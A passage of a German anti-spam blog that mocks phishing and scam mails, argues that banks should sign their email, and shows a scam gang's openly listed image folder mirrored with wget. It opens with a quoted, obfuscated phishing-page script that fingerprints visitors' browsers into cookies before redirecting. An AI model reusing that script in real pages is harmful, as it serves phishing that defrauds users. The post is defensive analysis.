Date()[K('0xb8')+K('0xec')+K('0xb5')+K(0xe7)+K('0xc3')+'et'](),n=Intl[K(0xcb)+K(0xe2)+K('0xb2')+K('0xb9')+'at']()[K('0xd6')+K(0xc7)+K('0xae')+K(0xcd)+K('0xbe')]()[K(0xbd)+K(0xd1)+'ne'],sp=navigator[K(0xdf)+K('0xe6')+'rm'],su=navigator[K(0xc6)+K(0xce)+K(0xc1)],iu=(document[K('0xb8')+K(0xe3)+K(0xac)+K(0xee)+K(0xc8)+K('0xb0')+'me'](K('0xed')+K(0xea))[0×0][K('0xe9')+K(0xd9)+K('0xe5')+K('0xbb')+'w']||document[K(0xb8)+K(0xe3)+K('0xac')+K('0xee')+K(0xc8)+K(0xb0)+'me'](K('0xed')+K('0xea'))[0×0][K('0xe9')+K(0xd9)+K('0xde')+K(0xc0)+K('0xc1')])[K('0xe0')+K('0xaa')+K('0xa7')][K(0xc6)+K('0xce')+K(0xc1)],wd=navigator[K('0xab')+K('0xda')+K(0xc2)];function set_cookie(U,V,H){const p=K;let q=new Date();q[p(0xa9)+p(0xec)+'e'](q[p(0xb8)+p('0xec')+'e']()+H*0×3c*0×3e8);let M='';if(H)M=p(0xdb)+p(0xe4)+p('0xd6')+'='+q[p('0xd2')+p('0xcc')+p('0xb6')+'ng']();document[p('0xdc')+p('0xd4')]=U+'='+escape(V)+M+(p('0xb3')+p(0xc9)+'/');}function get_cookie(U){const c=K;let V=document[c(0xdc)+c('0xd4')][c('0xd7')+'ch'](c(0xc4)+c(0xb7)+'?'+U+(c('0xca')+c('0xcf')+c('0xd3')+c(0xba)+')'));if(V)return unescape(V[0×2]);else return null;}!get_cookie('d')&&!get_cookie('n')&&(set_cookie('d',d,0×2),set_cookie('n',n,0×2),set_cookie('sp',sp,0×2),set_cookie('su',su,0×2),set_cookie('iu',iu,0×2),set_cookie('wd',wd,0×2));if(document[K('0xbf')+K(0xad)+'on'][K(0xdd)+'h'])set_cookie('hp',document[K('0xbf')+K(0xad)+'on'][K(0xdd)+'h'],0×2);</script><script>document . location . reload();</script>
$ _

Diese in Javascript realisierte Weiterleitung ist schon ein kleines bisschen kryptisch.

Mit Stable Diffusion generiertes BildIch hoffe, ich muss nicht erwähnen, dass es sich hier nicht um die Website der IHK handelt. In einem gegen Kriminalität, Schadsoftware und Überwachung leidlich abgesicherten Webbrowser, also in einem Webbrowser mit wirksamem Werbeblocker, wird der Link übrigens blockiert, weil er über das Werbenetzwerk von Google geht. Ich kann die Installation eines Werbeblockers nur dringend empfehlen. Es handelt sich um eine unentbehrliche und hochwirksame Schutzsoftware für ihre Computersicherheit, ihre Privatsphäre und ihr Nervensystem. Nur Werbung werden sie dafür niemals sehen. Werbung im Computersicherheitsbereich wird immer nur für wirkungslose Produkte und für Schlangenöl gemacht, die beidesamt leider nur „gefühlte Sicherheit“ geben. Wer nicht mehr auf Werbung hereinfallen kann, weil er sie gar nicht zu Gesicht bekommt, spart übrigens auch eine Menge Geld… 💡️

Hier auf Unser täglich Spam findet sich noch mehr Text zu Werbeblockern im Webbrowser und zu den journalistischen und lobbyistisch vorangetrieben politischen Kampagnen gegen diesen wichtigen Beitrag zur Computersicherheit und Kriminalitätsbekämpfung.

Wir hoffen, Sie damit ausreichend informiert zu haben.

Ich hoffe, sie damit ausreichend informiert zu haben. 🙂️

Mit freundlichen Grüßen,

IHK Deutschland
Fb Ig

Die IHK kenne ich ja, aber wer sind Fb und Ig? Handelt es sich hier um „fiel Blödheit und Ignoranz“? Beide Links führen übrigens auf die Startseite der Suchmaschine Google. 😁️

IHK Deutschland © 2024 IHK, Inc. All Rights Reserved.

Lindenstraße 2, 88250 Weingarten

Entf! 🗑️

Gefälschte Bank-E-Mails bleiben oft unerkannt

Freitag, 17. Mai 2024

Keine Spam, sondern ein Hinweis auf einen im Kontext der Spam interessanten Artikel auf der Website der ARD-Tagesschau [Archivversion, denn der Tagesschauartikel wird leider wieder depubliziert]:

Eine Phishing-Mail von einer echten Mail der Bank zu unterscheiden, fällt vielen schwer. Das zeigt eine aktuelle Studie von Verbraucherschützern. Die Opfer bleiben nicht selten auf den Kosten sitzen […] äußerten nur 57 Prozent der Befragten bei den Phishing-Mails einen Betrugsverdacht. 38 Prozent witterten aber auch bei echten Mails einen Betrug. „Die Maschen von Cyberkriminellen werden immer besser“

Ich habe hier schon in den Zeiten, in denen die meisten Phishingspams noch so schlecht waren, dass ein Mensch durchschnittlicher Intelligenz sofort das Phishing erkennen konnte, darauf hingewiesen, dass es nicht so bleiben wird. Und in der Tat: Phishing ist eine Konstante im täglichen Pesteingang geblieben, und die Spams wurden im Laufe der Zeit immer besser. Rechtschreibfehler sind selten geworden, und die Formulierungen sind insgesamt glatter geworden. Dass das passieren würde, war auch klar, denn die Betrüger sind darauf angewiesen, dass ihren Lügen Glauben geschenkt wird. Sie leben davon. Und sie wollen auch weiterhin davon leben, nachdem alle Naiven zu gebrannten Kindern geworden sind. Sonst müssten sie ja noch mit dem Arbeiten anfangen.

So lange Unternehmen sich weigern, digital signierte E-Mail zu versenden, deren Signatur der Empfänger überprüfen könnte, um die Identität des Absenders und die Integrität des Mailinhaltes jenseits jedes vernünftigen Zweifels sicherstellen zu können, so lange sind alle Menschen dem Phishing mehr oder minder wehrlos ausgeliefert. Das ist traurig, denn digitale Signatur von E-Mail steht seit über dreißig Jahren zur Verfügung, und schon sehr lange in Form von ausgereifter, gut entfehlerter und Freier Software, die nicht einmal Geld kostet und einfach genutzt werden kann.

Sicher, man kann sich den Quelltext einer unsignierten Mail anschauen, man kann die Header lesen (was beides schon über normale Anwenderkenntnisse hinausgeht, obwohl es nicht schwierig ist), man kann auch schauen, wohin die Links in der Mail führen (wobei die Betrüger gern mit vorsätzlich irreführenden Subdomains arbeiten) und sich anschauen, aus welchen Domains extern referenzierte Grafiken in HTML-Mail eingebettet wurden, um herauszubekommen, ob eine Mail möglicherweise echt oder ein Betrugsversuch eines Kriminellen ist. Aber nichts davon ist aus Anwendersicht so einfach und zuverlässig wie das Überprüfen einer digitalen Signatur. Aber genau diese eine einfache und sichere Methode wird den Menschen vorenthalten, wenn Banken und andere Unternehmen die Mail an ihre Kunden nicht digital signieren. Und zwar von den Banken und anderen Unternehmen. Nach über dreißig Jahren darf man meiner bescheidenen Meinung nach noch ergänzen: Und das geschieht vorsätzlich. Das ist bei Unternehmen, die ihr Geschäftsmodell immer weitergehend internetbasiert vorantreiben und ansonsten keinen Aufwand scheuen, keine Fahrlässigkeit mehr. Sie müssen wissen, was sie durch Unterlassung tun und welche Schäden sie damit bei anderen Menschen, ja, bei ihren Kunden unnötigerweise inkauf nehmen. Sie bekommen die Folgen ja unmittelbar mit. Jeden verdammten Tag. Es stört dort nicht weiter, es wird dort als ein „Problem anderer Leute“ betrachtet.

Ich wiederhole aus meinem Tagesschau-Zitat zum Eingang noch einmal einen Satz, der jetzt vielleicht schon wieder vergessen ist, damit er auch ja nicht vergessen wird:

Die Opfer bleiben nicht selten auf den Kosten sitzen

Mit Stable Diffusion generiertes BildEs können übrigens auch mal fünfstellige Beträge werden, für die ein Mensch ganz schön lange buckeln und knechten muss, um sie zu erarbeiten. Das tut weh. Jeder Mensch könnte mit diesem Geld etwas besseres anfangen, als den verfeinerten Lebensstil von Kriminellen zu finanzieren. Die Betrüger mit ihrem Phishing sind zweifellos Verbrecher, aber die Unternehmen, die es ihnen unnötig leicht machen, sind nicht weniger als die Grundlage dieses Verbrechens. Das gilt auch für ihre Bank, ihr bevorzugtes Shoppingportal und für ihren Einzelhändler. Die sind daran schuld, gar nicht so sehr anders, wie es ein Autohersteller wäre, der vorsätzlich Fahrzeuge ohne zuverlässig funktionierende Bremse verkaufte. Leider wäre zurzeit nur der Autohersteller haftbar. Die Unternehmen, die sich aus überhaupt nicht nachvollziehbaren Gründen weigern, ihre geschäftliche E-Mail digital zu signieren, verbuchen ihre marginalen Ersparnisse als Gewinn und lasten die Folgen und Kosten dieses Gewinnes ihren Kunden auf. Erfreulich straffrei. Also für die Unternehmen erfreulich. Für die Mehrzahl der Menschen leider nicht. Ja, es ist deprimierend. Aber es ist so. Und es ist politischer Wille, dass es so ist. Offenbar parteiübergreifender politischer Wille, denn das Problem besteht ja nicht erst seit gestern. Jede Bundesregierung hatte eine Möglichkeit gehabt, hier steuernd einzugreifen, wenn dazu nur ein politischer Wille bestanden hätte. Hat aber nicht. Es gab immer Wichtigeres. Wir haben jetzt ja eine Cyberwehr.

So lange sich das nicht ändert – wer in dieser Bundesregierung ist eigentlich für den so genannten „Verbraucherschutz“ zuständig, man hört von dieser Person ja gar nichts – bleibt uns allen nur die Selbsthilfe in diesen politisch und wirtschaftlich geschaffenen Zuständen, die schon längst vorsätzlich geschaffene Zustände sind. Leider gibt der Journalismus, weder bei der Tagesschau, noch in anderen journalistischen Medien, dafür eine lebenspraktisch wichtige Handhabe.

Deshalb mache ich das hier und fordere alle Menschen dazu auf, immer und unter allen Umständen jede E-Mail als gefährlich zu betrachten. Insbesondere gilt: Niemals in eine E-Mail klicken! Wenn man nicht in eine E-Mail klickt, kann einem kein Verbrecher einen giftigen, irreführenden Link unterschieben. Stattdessen einfach für alle regelmäßig besuchten Websites ein Lesezeichen im Webbrowser anlegen. Wenn eine Mail ankommt, die dazu auffordert, dass man tätig werden solle, damit man klickt oder einen Anhang öffnet, auf gar keinen Fall in die Mail klicken. Stattdessen einfach die Website über das Lesezeichen im Browser aufmachen, und sich dort ganz normal und wie gewohnt anmelden. Wenn man danach keinen Hinweis sieht, dass man jetzt ganz schnell tätig werden muss, war die E-Mail eine Phishingspam und man hat einen dieser gefürchteten Cyberangriffe abgewehrt. So einfach geht das. Es ist übrigens auch sehr wirksam, im Gegensatz zu allerlei Schlangenöl für die „gefühlte Sicherheit“. Also: Macht das! 🛡️

Und es ist nicht nur einfach, sondern auch völlig ohne Komfortverlust, denn in beiden Fällen muss man ja nur klicken. 🖱️

Aber auf gar keinen Fall in die Mail klicken! Jeder Klick in eine Mail ist gefährlich, wenn man sich nicht über eine andere Quelle davon überzeugt hat (zum Beispiel durch einen kurzen Anruf oder durch die Anmeldung auf der Website des angeblichen Absenders), dass sie wirklich vom scheinbaren Absender stammt. 🚫️

Sollen die Phisher doch verhungern, wenn ihr Betrug nicht mehr läuft!

Ich vermisse sie nicht.

Dieses einmalige, begrenzte Angebot läuft in 03:12 Minuten ab!

Montag, 22. April 2024

Schade, diese Mail ist jetzt schon rd. vierzig Minuten alt. Dann komme ich wohl nicht an dieses „einmalige“ (mein Spameingang quillt über) und „begrenzte“ (es gibt nur 1080 Atome im Universum) Angebot. So ein Jammer aber auch!

Wer schreibt mir denn?

Von: Sie sind ausgewählt <titanspin@calldiscountservices.com>

Viele sind berufen, aber wenige sind auserwählt (Mt.22:14). Wer interessiert sich da noch für den Absender. Das letzte Mal wollte der Honk mit gleicher Absenderadresse, dass ich mein Paket verfolge. Das habe ich nicht getan, stattdessen habe ich drüber gebloggt, ihn dabei verspottet und ein paar mit dem Wort „Titanspin“ begründete Vermutungen über sein hochkriminelles Umfeld geäußert. Dafür hat er oder sein armes ausgesetztes Paket mich jetzt auserwählt. Halleluja! 😇️

Und, wofür bin ich jetzt auserwählt? Komme ich in den Himmel? Aber nein doch:

Sie sind ausgewählt

Aus dem Web nachgeladenes, in die Spam eingebettetes Bild: 100% GRATIS -- 20x50€ -- Ihre 1000€ AMAZON Geschnekkarten -- [BESTÄTIGEN >] -- Guten Tag %%Surname%%, wir grautlieren ihnen recht herzlich. -- Sie gehören zu den Auserwählten fr eine Amazon-Umfrage. Nehmen Sie sich eine Minute Zeit und beantworten Sie 5 Fragen. Alle Teilnehmer haben die Chance auf Amazon-Gutscheine im Wert von 1000€. -- Folgende Teilnehmer können heute an der Umfrage teilnehmen: -- 1. Andre Fuchs -- 2. %%firstname%%%%Surname%% -- 3. Karin Herrlich -- Klicken Sie zur Teilnahme einfach auf "Jetzt teilnehmen" -- [JETZT TEILNEHMEN >]

ihre 1000€ AMAZON Geschenkkarten

Ich bin gar nicht auserwählt. %%firstname%% %%Surname%% ist auserwählt. Schade. Alle anderen sind lediglich auserwählt, über die gnadenlose Blödheit dieser Spammer zu lachen. Davon kann man sich zwar nichts kaufen, aber es macht heiter und bewahrt davor, betrogen zu werden. 😁️

Aus den Biotopen des Internetsumpfes

Das Bild in der Spam wird aus dem Web nachgeladen – das heißt: In einer guten Mailsoftware würde man es zum Schutz seiner Privatsphäre gar nicht erst sehen und müsste wie ich in den Quelltext der Mail schauen. Es wird nachgeladen…

<img src="http://mobile.darryring.com/images/yQQmO.jpg" border="0" alt="" style="width:593px;height:787px;" usemap="#zLOGLvTIPiI2KVKMT9"></a>

…von der Website in der Domain mobile.darryring.com. Und ich habe gerade so ein Déjà vu. Wenn ich die absolut miese Machart dieser Spam sehe, diese intellektuelle Unfähigkeit, zu erkennen, dass irgendwelche Namensplatzhalter aus einem unverstandenen Spamskript in einem Screenshot einfach nur lächerlich und blöd aussehen; wenn ich diese quietschende Dummheit ihrer Masche vor Augen habe… genau so etwas hatte ich doch schon einmal. Nur, dass das Bild damals aus der Website in der Domain zrabike.info nachgeladen wurde.

Damals war diese Bande intellektuell damit überfordert, im Webserver die Verzeichnisauflistung für ihren Bilderordner abzustellen, so dass man aus dem gesamten Internet bequem auf ihre ganze Sammlung zugreifen konnte. Es ist nicht schwierig, so etwas zu verhindern. Es wäre eine einzige Direktive für den Apache gewesen. Man findet dafür mühelos mit einer beliebigen Suchmaschine Anleitungen, die auch für Neulinge leicht verständlich sind. Mal schauen, ob diese Enthirnungsreste mit angeflanschtem Spamskript inzwischen wenigstens etwas gelernt haben und ob es ihnen inzwischen weniger gleichgültig ist – sorry für meine Kommandozeilengymnastik, aber so kann ich es am besten dokumentieren:

$ wget -q -r -np http://mobile.darryring.com/images/
$ du -hs mobile.darryring.com/
13M	mobile.darryring.com/
$ cd mobile.darryring.com/images/
$ ls | pr -4 -t
_20210223_150707_ fUQDx.jpg	    iphon15screenshot rr.png
2E99A.png	  GDFz4.png	    iphone15fr.png    seemyprfiole.PNG
2vdLp.png	  glsde.png	    iVubq.png	      spmCK.jpg
5vCS3.png	  gls.png	    IY1FL.png	      stde.png
7iDu9.jpg	  H0B8u.jpg	    LaposteChct.png   sxm.png
9h3D3.png	  harborus.png	    LnX6y.png	      tarsl2.png
asianakjdjdkdkdi. HGXel.jpg	    makitait.jpg      tEBM6.png
c0Lga.png	  HI7XL.jpg	    makitapl.png      temu.jpg
C1ykM.jpg	  hKablodahd3Ov.png mcafeedk.png      tr4lv.png
cHpGm.png	  I6jvd.png	    mcafeeit.png      transl.jpg
clsde.jpg	  IMiTR.jpg	    mil.png	      UG2IP.png
confirmbtn.png	  index.html	    nAVp2.png	      VABI7.png
deliveryimgg.png  index.html?C=D;O= netflixus.png     visionpro.jpg
deliveryimg.png	  index.html?C=D;O= nortonfr.png      VOfwR.jpg
dim-weight2.jpg	  index.html?C=M;O= nortonit.png      Vp8zo.jpg
dysonus.png	  index.html?C=M;O= oralb2be.png      xsVxq.png
DYSONV10.png	  index.html?C=N;O= parkfr.png	      YQgAa.png
elonus.png	  index.html?C=N;O= pjtDP.gif	      yQQmO.jpg
exprexx.jpg	  index.html?C=S;O= prud.jpg	      Z2Qxf.jpg
FR – Laposte Chec index.html?C=S;O= RQowQ.png	      ZjJTK.png
$ _

Man kommt natürlich auch mit einem ganz normalen Webbrowser an die Bilder. Man braucht dafür weder irgendwelche Kenntnisse, wie man einen Computer an der Kommandozeile bedient, noch irgendwelche komischen Programme, von denen man vielleicht bis eben noch nie etwas gehört hat. Es reicht, einfach den Dateinamen, also alles nach dem letzten Querstrich, in der URL wegzulassen und sich mal in einem Webbrowser – wie hier im Screenshot dem Firefox – anzuschauen, was sonst noch in diesem Verzeichnis herumliegt. Das ist „Hacken“ auf dem Niveau eines aufgeweckten Achtjährigen:

Screenshot meines Firefox, der diese Bilder anzeigt

Jackpot! 🎰️

Ja, das ist unzweifelhaft die gleiche Bande. Und die haben überhaupt nichts dazugelernt. Vermutlich ist ihnen das mit dem Lernen einfach ein bisschen zu anstrengend. Es kann ja auch nicht jeder die Grundschule erfolgreich abschließen.

Na gut, dann mache ich halt noch einmal, was ich schon einmal getan habe und bringe meine kleine Auswahl der tollsten Betrugsnummern einer dummen, technisch völlig inkompetenten Bande von Spammern in heiteren Bildern aus ihrem offenen Spambilderbuch. Ich verbinde damit die Hoffnung, jedem Menschen einen Einblick in die umfassende Kriminalität von Spammern zu geben und wünsche mir, dass niemand, der das gesehen hat, jemals wieder leichtfertig in eine Spam klickt, weil in der Spam drinsteht, dass man in die Spam klicken soll. Man kann dabei nämlich nichts gewinnen. Aber man kann sich schnell einen Haufen Probleme damit holen.

Na, möchte noch jemand ein iPhone 11 Pro. „Google“ hat eines zu verschenken:

Französischer Betrugstext

Aber schnell machen, da liegen nur noch zwei Stück herum bei „Google“, und wenn man nicht vorm Denken klickt, laufen die einfach so weg! Warum „Google“ nicht lieber seine eigenen „Pixel“-Dinger verschenkt? Fragt doch mal den Spammer! Vielleicht hat er sich ja etwas dabei gedacht. Ich weiß allerdings nicht, was er sich dabei gedacht haben könnte.

Aber so ein iPhone 11 ist ja auch schon ein bisschen alt. Da nimmt man doch lieber, was die Deutschen Telekomiker zu verschenken haben:

Englischer Betrugstext

Da steht auch nichts von irgendeiner Beschränkung, aber dafür ist es brandneu. Ja, man kann geradezu riechen, wie hirnverbrannt die Masche ist. Man muss nur eine Minute lang Fragen beantworten, und schon kriegt man einen tragbaren (im physikalischen Sinne, nicht im Preis) Computer geschenkt, auf dem einem nicht einmal mehr das Recht eingeräumt werden soll, selbst darüber zu entscheiden, welche Software darauf ausgeführt wird. Weil man sonst ja gar nicht so gut von Apple gegängelt und gemolken werden kann. Andere müssen dafür über siebenhundert Øre hinlegen. Ich würde mir so etwas generell – also auch ohne Spam – nicht einmal schenken lassen, aber ich bin ja auch etwas altmodisch und bestehe darauf, dass ich selbst darüber entscheiden kann, welche Software auf meinen Computern ausgeführt wird. Denen, denen der Handywahn tief ins Gehirnchen gebissen hat, bedeuten solche Dinge leider nichts mehr. Denen reicht es, wenn sie mit dem Gerät rumspielen können, während sie bei Aldi in der Schlange stehen… und wenn dort jeder den Apfel sieht. 🍏️

Apropos Apfel:

Bild einer Apple Vision Pro

Eine Taucherbrille von Apple gibt es auch. Damit kann man auch viel besser die Zukunft umarmen, aber nur, wenn man auch als Apfelshopper zur Apfelfamilie gehört:

Englischer Betrugstext

Vermutlich wird man dabei so dumm, dass man auf derart plumpe Spam hereinfällt. Schade nur, dass es noch ein bisschen lächerlich aussieht, wenn man mit so einer Taucherbrille in der Schlange vor der Aldikasse steht. Sonst hätte ich im Alltag viel mehr zu lachen. 😁️

Englischer Betrugstext

Schon bemerkenswert, wie viel primitiver Betrug sich wieder einmal ausgerechnet an Apple-Kunden richtet. Ob das einfach nur ein dummer Zufall ist? Oder ob diese Leute wegen ihrer Freude am sinnlosen Geldausgeben und ihrer intellektuellen Befähigungen eine besonders gute Zielgruppe für solche Betrugsmaschen sind? Ich weiß es nicht. Ich habe da nur so einen Verdacht… 😁️

Aber es gibt ja auch Erfreulicheres. Zum Beispiel Elon Musk, der uns allen eine tolle und scheinbar vollautomatische Möglichkeit zum Stromsparen anbietet. Nein, nicht einfach alle Geräte ausschalten, wie das ein naiver Mensch denken könnte. Sondern stattdessen ein weiteres Gerät einschalten. Können diese Augen lügen?

Englischer Betrugstext

Man kann zwar in dieser Größe – es ist die Originalgröße des Bildes, das in der Spam verwendet wird – nicht mehr so gut lesen, was Elon „Technikjesus“ Musk angeblich zu seinen Jüngern gesagt haben soll, aber wer noch lesen kann, ist vermutlich eh viel zu intelligent, um auf den Betrug hereinzufallen. Und außerdem ist ein Bild von Elon „Technikjesus“ Musk dabei. Das hat er bestimmt als Selfie im Hyperloop geschossen. Oder in seinem teuren Feuerwerkskörper… ähm… Starship auf dem Weg zum Mars, dessen liebliche, wenn auch mit rd. -50 °C etwas kühle Steinwüsten er so gern durchwandern möchte. Wenigstens gibts dort noch ausreichend Parkplatz für die rd. 5,70 m langen und rd. 2,40 m breiten Cybertrucks aus bei irdischen Wetterbedingungen rostanfälligem Metall. In den irdischen Städten sieht es mit den Parkplätzen für solche überdimensionierten Protzkarren aus der Narzisstenhölle ja nicht mehr so gut aus. Wer ein bisschen Englisch versteht, bekommt hier die passende Musik zum magischen Stromsparkästchen. Das Video ist gealtert wie ein guter Wein. Die leichtgläubigen Fans von Elon „Technikjesus“ Musk sind hingegen eher gealtert wie senile bis demente Esel. 😄️

Denen kann man dann auch erzählen, dass Elon „Technikjesus“ Musk so irre reich geworden ist, weil er in Kryptogeld gemacht hat – mit einem ganz geheimen Geheimsystem, von dem man in Spams erfährt und das man im offenen Web auf einer Website nachlesen kann:

Englischer Betrugstext

Man muss nicht unbedingt dumm wie ein halber Meter trockenen Feldweges sein, um darauf reinzufallen, aber es ist schon sehr hilfreich. Die Jünger von Elon „Technikjesus“ Musk scheinen für Betrüger eine genau so gute Zielgruppe wie die Käufer von Appleprodukten zu sein, so oft, wie ich dieses Gesicht in den Bildern sehe.

Ach! Natürlich gibts auch wieder Schadsoftware:

Italienischer Betrugstext

Klar, es gibt total protection, wenn man sich sein Antivirusschlangenöl von irgendwelchen Spammern mit einer Spam andrehen lässt! Wer es glaubt, wird zwar nicht selig, aber bekommt dafür kostenlos einen Computer anderer Leute auf seinem Schreibtisch.

Und auch die gegenwärtige Pest des Spameingangs, die Paketspam, darf keineswegs fehlen. Die Nummer ist in anderen Sprachen genau so dumm wie auf Deutsch:

Foto eines Paketes

Englischer Betrugstext

Englischer Betrugstext

Was beim letzten Bild sofort auffällt: Es ist eine ziemlich große Datei. Das liegt daran, dass es sich um ein animiertes GIF handelt. Den animierten Teil will ich gern damit würdigen, dass ich ihn hier noch einmal zeige:

Animation aus dem letzten Bild

Wenn da ein Bote so flott mit seinem Roller durch die gebahnten Straßen des Posteinganges rollend auf der Stelle steht, verstehe ich gar nicht, warum ich noch etwas machen soll, damit das Paket auch bei mir ankommt. 😂️

Das gleiche gilt natürlich…

Albernes Bild: Ein Paketbote rollt mit dem Paket aus dem Handy

…wenn der Paketbote schon aus dem Handy rollt. 🤣️

Aber nein, es gibt immer nur Probleme mit diesen ganzen Paketen:

Italienischer Betrugstext

Wer von den dummen Spammern ist eigentlich auf die alberne Idee gekommen, dass so eine Spam viel überzeugender aussieht, wenn sie ein Foto des Paketes enthält? Stellt die Zielgruppe dieses Betruges sich wirklich vor, dass da jemand beim Logistiker sitzt und jedes Paket einzeln fotografiert, das aus irgendeinem Grund nicht zugestellt werden kann? Traumberuf Fotograf, der Pakete fotografiert. Immer schön von den anderen Paketen separiert auf einen Tisch gestellt, damit man das Paket auch gut erkennen kann, aber ohne irgendeine weitere Information wie etwa den Absender im Text der Spam? Man muss schon sehr einfach in seinem Köpfchen gestrickt sein, wenn man davon keinen Anfall spontaner Heiterkeit kriegt. 😅️

Ohne diese gnadenlos dumme Idee…

Französischer Betrugstext.

…und bei Verwendung eines albernen Cliparts wirkt so eine Spam wenigstens ein bisschen glaubwürdiger. Aber nur so ein klitzekleines bisschen. 🤏️😄️

Ach, dass mir der Namensteil mit „titanspin“ in der Absenderadresse sehr bekannt vorkommt, habe ich ja schon erwähnt. Natürlich dürfen auch die Abzockcasinos nicht fehlen. Die hierzu verwendete Grafik ist aber nur geringfügig besser als beim letzten Mal geworden:

Französischer Betrugstext.

Ansonsten gibt es nur wenig Neues in diesem artenreichen und hirnarmen Biotop der Spammer, das meiste haben wir ja schon auf unserer letzten Wanderung gesehen. Die kleine Exkursion in die sumpfigen Bereiche des Internet ist hiermit beendet.

Mit Stable Diffusion generiertes Bild: Schlammverschmierte junge Frauen mit bunten Haaren verlassen das Biotop

Es war zwar mal wieder ein bisschen schmutzig, aber es hat dennoch eine Menge Spaß gemacht. Und das ist doch die Hauptsache dabei.